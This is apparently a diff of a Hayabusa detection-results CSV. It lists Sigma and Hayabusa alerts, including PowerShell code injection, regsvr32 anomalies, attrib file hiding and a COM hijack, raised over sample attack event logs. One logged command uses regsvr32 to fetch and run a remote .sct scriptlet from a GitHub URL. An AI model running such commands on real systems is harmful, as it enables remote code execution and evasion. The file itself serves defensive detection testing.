+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid  :  Command: winpm.exe  //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js  :  Path: C:\ProgramData\winpm.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories  :  Command: attrib  +h nbtscan.exe  :  Path: C:\Windows\System32\attrib.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe""   :  Path: C:\Users\IEUser\Downloads\com-hijack.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
